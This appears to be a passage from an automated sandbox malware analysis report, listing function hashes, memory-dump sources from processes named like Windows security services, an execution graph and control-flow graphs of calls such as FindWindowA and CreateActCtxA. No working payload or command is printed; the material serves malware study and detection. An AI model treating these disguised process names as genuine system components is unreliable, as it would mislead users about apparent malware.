                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^ $O_^"$O_^$
                                                    • API String ID: 0-3242351273
                                                    • Opcode ID: 9dc6fde734266337beadab918741b36b2a6d3cf280e3b6a6d5c1ce6b6f1537be
                                                    • Instruction ID: 906414dcda4c4b344921edaebcf88157f69c63727a945542bac47145f6f4f184
                                                    • Opcode Fuzzy Hash: 9dc6fde734266337beadab918741b36b2a6d3cf280e3b6a6d5c1ce6b6f1537be
                                                    • Instruction Fuzzy Hash: C971397691E1559FD341BB3CA4A51FE3FB0EF80355B8401B6D04ECB387DE2C64069668
                                                    Function 00007FF848F10C8E Relevance: .3, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0f8b960f35724b0eff4f65c429ba00e6cfa3d2f3754f0f6cf22ddd53819386c
                                                    • Instruction ID: ff5b07b28c4cfdf375bcd8aea6a6668ae6831ab97ed48f818c89047aa6f2eead
                                                    • Opcode Fuzzy Hash: b0f8b960f35724b0eff4f65c429ba00e6cfa3d2f3754f0f6cf22ddd53819386c
                                                    • Instruction Fuzzy Hash: 5A712332A1D99A5FE795B73C98162B97BE2EFC9750F0400BAD84DC32D7DE286C428750
                                                    Function 00007FF848F107D3 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 545500912a8a8e451dc2cde5d4f3ebd72c53d0f2572296fcb350da9e62e060b4
                                                    • Instruction ID: 50be13d491f0a2ddfe7913b332b0a9c0966bf9548317b84ca506b1a8bd3a8903
                                                    • Opcode Fuzzy Hash: 545500912a8a8e451dc2cde5d4f3ebd72c53d0f2572296fcb350da9e62e060b4
                                                    • Instruction Fuzzy Hash: CD41B371A5A65A9FD744FB3890A51FE3FB1FFC4301B8041AAD00AC738BDE2C69019769
                                                    Function 00007FF848F10B29 Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57180b7ae76a7a74c5853b76d839f03c3a254be0d0069b6afaa41eeb127e3871
                                                    • Instruction ID: c9fe91bb818f5414ea68e5cd084d94711a69181e9bfab1828ca230f9265928d7
                                                    • Opcode Fuzzy Hash: 57180b7ae76a7a74c5853b76d839f03c3a254be0d0069b6afaa41eeb127e3871
                                                    • Instruction Fuzzy Hash: 7731F031F2995A9FE784B7B8581A3B9B6E2FF98741F04017AE40DD32C2DE2C98018752
                                                    Function 00007FF848F10850 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0c01bfc6a06f881be40b6e9d19a091de10eec28e527bd9204bb8f1bce0e6b56
                                                    • Instruction ID: 061e959f368e09b1690a8e22faaa07172c6b0245f5c2c6b3d1d1f35adad9ae90
                                                    • Opcode Fuzzy Hash: b0c01bfc6a06f881be40b6e9d19a091de10eec28e527bd9204bb8f1bce0e6b56
                                                    • Instruction Fuzzy Hash: 8731A571A5A6499FD744EB3890A55BE7F71EF84200FC045A9D40AC338FDE2C5A009769
                                                    Function 00007FF848F109E1 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70e82654677d0dda64d239da751dc42ba1d2d650ff3f7fd7c54d1b2e7ea93337
                                                    • Instruction ID: b2361f3ad590c628cf0a3bad538bbcc814f6372aca95df021630a28135f036d5
                                                    • Opcode Fuzzy Hash: 70e82654677d0dda64d239da751dc42ba1d2d650ff3f7fd7c54d1b2e7ea93337
                                                    • Instruction Fuzzy Hash: 96317E31A29A1A9FDB44FB68C4656FEBBF1FF98301F904579D009D3286DE3CA8418B54
                                                    Function 00007FF848F11A49 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6117837f44125c4e8fbe4871a4750b0ed7fa64c5b06998d9eec95006ba557698
                                                    • Instruction ID: 3f32e0afd41195067cad05c654ea1fb693a526552d180a90afb1154d4c089986
                                                    • Opcode Fuzzy Hash: 6117837f44125c4e8fbe4871a4750b0ed7fa64c5b06998d9eec95006ba557698
                                                    • Instruction Fuzzy Hash: 35216B30B1DA495FE788EB2C946A379B6D2EB9C745F0405BEE00EC32D7DE68AC418745
                                                    Function 00007FF848F11B41 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000003B.00000002.2382017717.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_59_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d4785e29d6297f5e9f6c3b2d122d14101fe75e1c20c4aa2043d74d3edc78679
                                                    • Instruction ID: ed195e2fde26efea63e994266771109d6ff1a41c7f576ac0375aeb7f55e37a56
                                                    • Opcode Fuzzy Hash: 3d4785e29d6297f5e9f6c3b2d122d14101fe75e1c20c4aa2043d74d3edc78679
                                                    • Instruction Fuzzy Hash: F7012824A0D6C10FE351B33868664767FE48F91391F0804ABD889C70D7F9189D858382

                                                    Execution Graph

                                                    Execution Coverage:10%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:49
                                                    Total number of Limit Nodes:6
                                                    execution_graph 11024 28ae208 11025 28ae21d 11024->11025 11029 28ae230 11025->11029 11033 28ada28 11025->11033 11028 28ada28 OleInitialize 11030 28ae26f 11028->11030 11030->11029 11038 28adafc 11030->11038 11032 28ae31c 11032->11032 11035 28ada33 11033->11035 11034 28ae23e 11034->11028 11034->11029 11035->11034 11036 28adafc OleInitialize 11035->11036 11037 28ae31c 11036->11037 11039 28adb07 11038->11039 11040 28ae633 11039->11040 11042 28adb18 11039->11042 11040->11032 11043 28ae668 OleInitialize 11042->11043 11044 28ae6cc 11043->11044 11044->11040 11045 28a0848 11046 28a0852 11045->11046 11048 28a21b2 11045->11048 11049 28a21d5 11048->11049 11053 28a22af 11049->11053 11057 28a22c0 11049->11057 11055 28a22c0 11053->11055 11054 28a23c4 11054->11054 11055->11054 11061 28a1980 11055->11061 11059 28a22e7 11057->11059 11058 28a23c4 11058->11058 11059->11058 11060 28a1980 CreateActCtxA 11059->11060 11060->11058 11062 28a3350 CreateActCtxA 11061->11062 11064 28a3413 11062->11064 11065 28adc40 DuplicateHandle 11066 28adcd6 11065->11066 11067 28ac110 11068 28ac16c FindWindowExA 11067->11068 11070 28ac25f 11068->11070 11071 28abbd0 11073 28abc25 11071->11073 11072 28abcd2 FindWindowA 11074 28abd14 11072->11074 11073->11072 11073->11073 11075 28ad5f0 11076 28ad5f1 GetCurrentProcess 11075->11076 11078 28ad688 GetCurrentThread 11076->11078 11079 28ad681 11076->11079 11080 28ad6be 11078->11080 11081 28ad6c5 GetCurrentProcess 11078->11081 11079->11078 11080->11081 11084 28ad6fb 11081->11084 11082 28ad723 GetCurrentThreadId 11083 28ad754 11082->11083 11084->11082

                                                    Executed Functions

                                                    Function 028AD5B0 Relevance: 6.2, APIs: 4, Instructions: 150threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 352 28ad5b0-28ad5da 357 28ad5dc-28ad5de 352->357 358 28ad5e0-28ad5e8 352->358 357->358 359 28ad5ea-28ad5f0 358->359 360 28ad5f1-28ad67f GetCurrentProcess 358->360 359->360 365 28ad688-28ad6bc GetCurrentThread 360->365 366 28ad681-28ad687 360->366 367 28ad6be-28ad6c4 365->367 368 28ad6c5-28ad6f9 GetCurrentProcess 365->368 366->365 367->368 370 28ad6fb-28ad701 368->370 371 28ad702-28ad71a 368->371 370->371 382 28ad71d call 28adfa8 371->382 383 28ad71d call 28adbae 371->383 374 28ad723-28ad752 GetCurrentThreadId 375 28ad75b-28ad7bd 374->375 376 28ad754-28ad75a 374->376 376->375 382->374 383->374
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$Process$Thread
                                                    • String ID:
                                                    • API String ID: 3242834020-0
                                                    • Opcode ID: 087d62c55e077c0b178667aee4988f966c8dd5f37981dbeeedf45db759e4aae0
                                                    • Instruction ID: 8d0c6aa0979de7499e729c3af5b36bb0920fe7775700f47a7bf7ce6663ddee20
                                                    • Opcode Fuzzy Hash: 087d62c55e077c0b178667aee4988f966c8dd5f37981dbeeedf45db759e4aae0
                                                    • Instruction Fuzzy Hash: 1B518AB89012488FEB04DFA9D558BDEBFF5EF49304F20849AD108E7261DB785848CB65
                                                    Function 028AD5F0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 384 28ad5f0-28ad67f GetCurrentProcess 389 28ad688-28ad6bc GetCurrentThread 384->389 390 28ad681-28ad687 384->390 391 28ad6be-28ad6c4 389->391 392 28ad6c5-28ad6f9 GetCurrentProcess 389->392 390->389 391->392 394 28ad6fb-28ad701 392->394 395 28ad702-28ad71a 392->395 394->395 406 28ad71d call 28adfa8 395->406 407 28ad71d call 28adbae 395->407 398 28ad723-28ad752 GetCurrentThreadId 399 28ad75b-28ad7bd 398->399 400 28ad754-28ad75a 398->400 400->399 406->398 407->398
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 028AD66E
                                                    • GetCurrentThread.KERNEL32 ref: 028AD6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 028AD6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 028AD741
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 520badb73426798ef56bca9ef6d6540baebf667ffd4d29e4973f1453439f07fd
                                                    • Instruction ID: 349d696578dec10dc8b953abdfd722da69d688bce51a3f60de4f497b7c9ab0b6
                                                    • Opcode Fuzzy Hash: 520badb73426798ef56bca9ef6d6540baebf667ffd4d29e4973f1453439f07fd
                                                    • Instruction Fuzzy Hash: F25167B89002098FDB14DFAAD548BAEBBF5EF48304F20C459D509E73A0DB785948CF65
                                                    Function 028AC106 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1016 28ac106-28ac109 1017 28ac10b-28ac178 1016->1017 1018 28ac0ef-28ac0fa 1016->1018 1022 28ac17a-28ac184 1017->1022 1023 28ac1b1-28ac1d1 1017->1023 1022->1023 1024 28ac186-28ac188 1022->1024 1030 28ac20a-28ac20f 1023->1030 1031 28ac1d3-28ac1dd 1023->1031 1025 28ac18a-28ac194 1024->1025 1026 28ac1ab-28ac1ae 1024->1026 1028 28ac198-28ac1a7 1025->1028 1029 28ac196 1025->1029 1026->1023 1028->1028 1032 28ac1a9 1028->1032 1029->1028 1034 28ac219-28ac25d FindWindowExA 1030->1034 1031->1030 1033 28ac1df-28ac1e1 1031->1033 1032->1026 1035 28ac1e3-28ac1ed 1033->1035 1036 28ac204-28ac207 1033->1036 1037 28ac25f-28ac265 1034->1037 1038 28ac266-28ac29e 1034->1038 1039 28ac1ef 1035->1039 1040 28ac1f1-28ac200 1035->1040 1036->1030 1037->1038 1045 28ac2ae-28ac2b2 1038->1045 1046 28ac2a0-28ac2a4 1038->1046 1039->1040 1040->1040 1041 28ac202 1040->1041 1041->1036 1048 28ac2c2 1045->1048 1049 28ac2b4-28ac2b8 1045->1049 1046->1045 1047 28ac2a6-28ac2a9 call 28a0224 1046->1047 1047->1045 1053 28ac2c3 1048->1053 1049->1048 1051 28ac2ba-28ac2bd call 28a0224 1049->1051 1051->1048 1053->1053
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 028AC24D
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 19a399abc082d9513e75dc83308e24e4ff24da71cf928ef9b5b188f3cb315855
                                                    • Instruction ID: 4ebd872f1df20081c3819fdcfe64cb1644216b024bc1ff86a278ca5507eb77af
                                                    • Opcode Fuzzy Hash: 19a399abc082d9513e75dc83308e24e4ff24da71cf928ef9b5b188f3cb315855
                                                    • Instruction Fuzzy Hash: B35179B9E006489FEB10CFE9C95179DBBF5EF48714F10812AE829E7254DB789841CF81
                                                    Function 028AC110 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1054 28ac110-28ac178 1056 28ac17a-28ac184 1054->1056 1057 28ac1b1-28ac1d1 1054->1057 1056->1057 1058 28ac186-28ac188 1056->1058 1064 28ac20a-28ac25d FindWindowExA 1057->1064 1065 28ac1d3-28ac1dd 1057->1065 1059 28ac18a-28ac194 1058->1059 1060 28ac1ab-28ac1ae 1058->1060 1062 28ac198-28ac1a7 1059->1062 1063 28ac196 1059->1063 1060->1057 1062->1062 1066 28ac1a9 1062->1066 1063->1062 1071 28ac25f-28ac265 1064->1071 1072 28ac266-28ac29e 1064->1072 1065->1064 1067 28ac1df-28ac1e1 1065->1067 1066->1060 1069 28ac1e3-28ac1ed 1067->1069 1070 28ac204-28ac207 1067->1070 1073 28ac1ef 1069->1073 1074 28ac1f1-28ac200 1069->1074 1070->1064 1071->1072 1079 28ac2ae-28ac2b2 1072->1079 1080 28ac2a0-28ac2a4 1072->1080 1073->1074 1074->1074 1075 28ac202 1074->1075 1075->1070 1082 28ac2c2 1079->1082 1083 28ac2b4-28ac2b8 1079->1083 1080->1079 1081 28ac2a6-28ac2a9 call 28a0224 1080->1081 1081->1079 1087 28ac2c3 1082->1087 1083->1082 1085 28ac2ba-28ac2bd call 28a0224 1083->1085 1085->1082 1087->1087
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 028AC24D
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: dc3a05625146c1cb5c218bb7b25f9fa7287e42398af4af3a9c11c56c40178444
                                                    • Instruction ID: b117d468fccc0a83d433d986b8a8dad5080a2279d05df346ba0c8266e8d3e3f3
                                                    • Opcode Fuzzy Hash: dc3a05625146c1cb5c218bb7b25f9fa7287e42398af4af3a9c11c56c40178444
                                                    • Instruction Fuzzy Hash: 645148B9E006499FEB10DFE9C95579EBBF1EF48704F10812AE829E7254DB789841CF81
                                                    Function 028ABBCA Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1088 28abbca-28abc31 1090 28abc6a-28abc8a 1088->1090 1091 28abc33-28abc3d 1088->1091 1098 28abc8c-28abc96 1090->1098 1099 28abcc3-28abd12 FindWindowA 1090->1099 1091->1090 1092 28abc3f-28abc41 1091->1092 1093 28abc43-28abc4d 1092->1093 1094 28abc64-28abc67 1092->1094 1096 28abc4f 1093->1096 1097 28abc51-28abc60 1093->1097 1094->1090 1096->1097 1097->1097 1100 28abc62 1097->1100 1098->1099 1101 28abc98-28abc9a 1098->1101 1105 28abd1b-28abd53 1099->1105 1106 28abd14-28abd1a 1099->1106 1100->1094 1103 28abc9c-28abca6 1101->1103 1104 28abcbd-28abcc0 1101->1104 1107 28abcaa-28abcb9 1103->1107 1108 28abca8 1103->1108 1104->1099 1113 28abd63-28abd67 1105->1113 1114 28abd55-28abd59 1105->1114 1106->1105 1107->1107 1109 28abcbb 1107->1109 1108->1107 1109->1104 1116 28abd69-28abd6d 1113->1116 1117 28abd77 1113->1117 1114->1113 1115 28abd5b-28abd5e call 28a0224 1114->1115 1115->1113 1116->1117 1119 28abd6f-28abd72 call 28a0224 1116->1119 1121 28abd78 1117->1121 1119->1117 1121->1121
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 063b6d9af3fa262539d85bb783f03c1c881bfc6286c300a84b115e6db30d3575
                                                    • Instruction ID: 32582ff1e1e827649ea512152ea9e47ca9fe72747407a865e820a6a85e80f88a
                                                    • Opcode Fuzzy Hash: 063b6d9af3fa262539d85bb783f03c1c881bfc6286c300a84b115e6db30d3575
                                                    • Instruction Fuzzy Hash: A6513878D006598FEB10CFA9C8A5B9DBBF1FF58718F148129E819E7254DB749881CF81
                                                    Function 028ABBD0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1122 28abbd0-28abc31 1124 28abc6a-28abc8a 1122->1124 1125 28abc33-28abc3d 1122->1125 1132 28abc8c-28abc96 1124->1132 1133 28abcc3-28abd12 FindWindowA 1124->1133 1125->1124 1126 28abc3f-28abc41 1125->1126 1127 28abc43-28abc4d 1126->1127 1128 28abc64-28abc67 1126->1128 1130 28abc4f 1127->1130 1131 28abc51-28abc60 1127->1131 1128->1124 1130->1131 1131->1131 1134 28abc62 1131->1134 1132->1133 1135 28abc98-28abc9a 1132->1135 1139 28abd1b-28abd53 1133->1139 1140 28abd14-28abd1a 1133->1140 1134->1128 1137 28abc9c-28abca6 1135->1137 1138 28abcbd-28abcc0 1135->1138 1141 28abcaa-28abcb9 1137->1141 1142 28abca8 1137->1142 1138->1133 1147 28abd63-28abd67 1139->1147 1148 28abd55-28abd59 1139->1148 1140->1139 1141->1141 1143 28abcbb 1141->1143 1142->1141 1143->1138 1150 28abd69-28abd6d 1147->1150 1151 28abd77 1147->1151 1148->1147 1149 28abd5b-28abd5e call 28a0224 1148->1149 1149->1147 1150->1151 1153 28abd6f-28abd72 call 28a0224 1150->1153 1155 28abd78 1151->1155 1153->1151 1155->1155
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 2a256175c2d55eb47cd1830753320fb6fc34242f64d40662e89f177d494f2e4d
                                                    • Instruction ID: 6a2e83824f51ddabb1f93a9e75a254099ab684de55fe25e3352d11893c608255
                                                    • Opcode Fuzzy Hash: 2a256175c2d55eb47cd1830753320fb6fc34242f64d40662e89f177d494f2e4d
                                                    • Instruction Fuzzy Hash: 82513778D006598FEB10CFA9C8A5B9EBBF1FF58718F148129E819E7254DB749881CF81
                                                    Function 028A3346 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1156 28a3346-28a334e 1157 28a3350-28a3411 CreateActCtxA 1156->1157 1159 28a341a-28a3474 1157->1159 1160 28a3413-28a3419 1157->1160 1167 28a3483-28a3487 1159->1167 1168 28a3476-28a3479 1159->1168 1160->1159 1169 28a3498-28a34c8 1167->1169 1170 28a3489-28a3495 1167->1170 1168->1167 1174 28a347a-28a3495 1169->1174 1175 28a34ca-28a354c 1169->1175 1170->1169 1174->1169
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 028A3401
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 54db51979ac9f3eb4598e8029f080cc0b9a0a50035c9a9eab6fa0d1d0cd26967
                                                    • Instruction ID: d7df66ad2f7d09240ed1e9648c49b32d733ccdb542a02e7e8df2156c8eea0d0e
                                                    • Opcode Fuzzy Hash: 54db51979ac9f3eb4598e8029f080cc0b9a0a50035c9a9eab6fa0d1d0cd26967
                                                    • Instruction Fuzzy Hash: C341F4B4C00619CBEB25CFA9C844BCDFBB5BF45304F20846AD408AB255DB75694ACF90
                                                    Function 028A1980 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1177 28a1980-28a3411 CreateActCtxA 1180 28a341a-28a3474 1177->1180 1181 28a3413-28a3419 1177->1181 1188 28a3483-28a3487 1180->1188 1189 28a3476-28a3479 1180->1189 1181->1180 1190 28a3498-28a34c8 1188->1190 1191 28a3489-28a3495 1188->1191 1189->1188 1195 28a347a-28a3495 1190->1195 1196 28a34ca-28a354c 1190->1196 1191->1190 1195->1190
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 028A3401
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 3c1a7552f6123833d89ed2dfda821151ea3a28b6c60a5295b0ab3c1e7a032702
                                                    • Instruction ID: 76d5c43e26c75b2bf5c6e7d747a53421d5712e8a02cc49bb618f9285b1d88153
                                                    • Opcode Fuzzy Hash: 3c1a7552f6123833d89ed2dfda821151ea3a28b6c60a5295b0ab3c1e7a032702
                                                    • Instruction Fuzzy Hash: F141F3B8C0071DCBEB25CFA9C844B9DFBB5BF44304F2080AAD409AB255DB75694ACF90
                                                    Function 028ADC39 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028ADCC7
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 0974a76499d378648d85c0b4c776482e8b8cda4f71a4c24ff1b770a556483443
                                                    • Instruction ID: 0b83241b158e2f71867fcc08934754b333998120b8f8195b2d3d9bf0edd3d4d7
                                                    • Opcode Fuzzy Hash: 0974a76499d378648d85c0b4c776482e8b8cda4f71a4c24ff1b770a556483443
                                                    • Instruction Fuzzy Hash: F421E7B5D00208DFDB10CF9AD584ADEBBF4EB48314F14841AE914A3350D779A944CF65
                                                    Function 028ADC40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028ADCC7
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: d47e6ba06efd1eea3e90b02a9537c176a76174de4873b645b3c90d97fb44ba42
                                                    • Instruction ID: 795710042be548e614b572b6af4212ff5c1ed80fd635e763d01536056f2cc54a
                                                    • Opcode Fuzzy Hash: d47e6ba06efd1eea3e90b02a9537c176a76174de4873b645b3c90d97fb44ba42
                                                    • Instruction Fuzzy Hash: DF21B0B59002489FDB10CFAAD984ADEBBF9EB48310F14841AE918A3350D779A944CFA5
                                                    Function 028AE660 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 028AE6BD
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 6a12e87aa2d76660958fb808d5c0b89b350c0b0322da46c872b29423fc8a7dae
                                                    • Instruction ID: a421c46afe4b6c179ac689825f19f3fe7b056bd421c5a07e3298214eaae63ba4
                                                    • Opcode Fuzzy Hash: 6a12e87aa2d76660958fb808d5c0b89b350c0b0322da46c872b29423fc8a7dae
                                                    • Instruction Fuzzy Hash: ED1103B58003488FDB20DFAAD545BDEBFF8EB49320F108469D558A7211D778A544CFA5
                                                    Function 028ADB18 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 028AE6BD
                                                    Memory Dump Source
                                                    • Source File: 00000057.00000002.2599047859.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_87_2_28a0000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 6fe19de746c80d3c13cf9ef4239b33b2d771503a494490b4a1d70eaebbf57092
                                                    • Instruction ID: 372ca16f0a87e40a418a5cf20f474d9451b89b941b3160f6da3d4223b5dbf5ce
                                                    • Opcode Fuzzy Hash: 6fe19de746c80d3c13cf9ef4239b33b2d771503a494490b4a1d70eaebbf57092
                                                    • Instruction Fuzzy Hash: FF1133B88003088FDB20DF9EC444B9EBBF8EB48310F108869D518A3211C778A944CFA5
                                                    Function 00E0D4D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
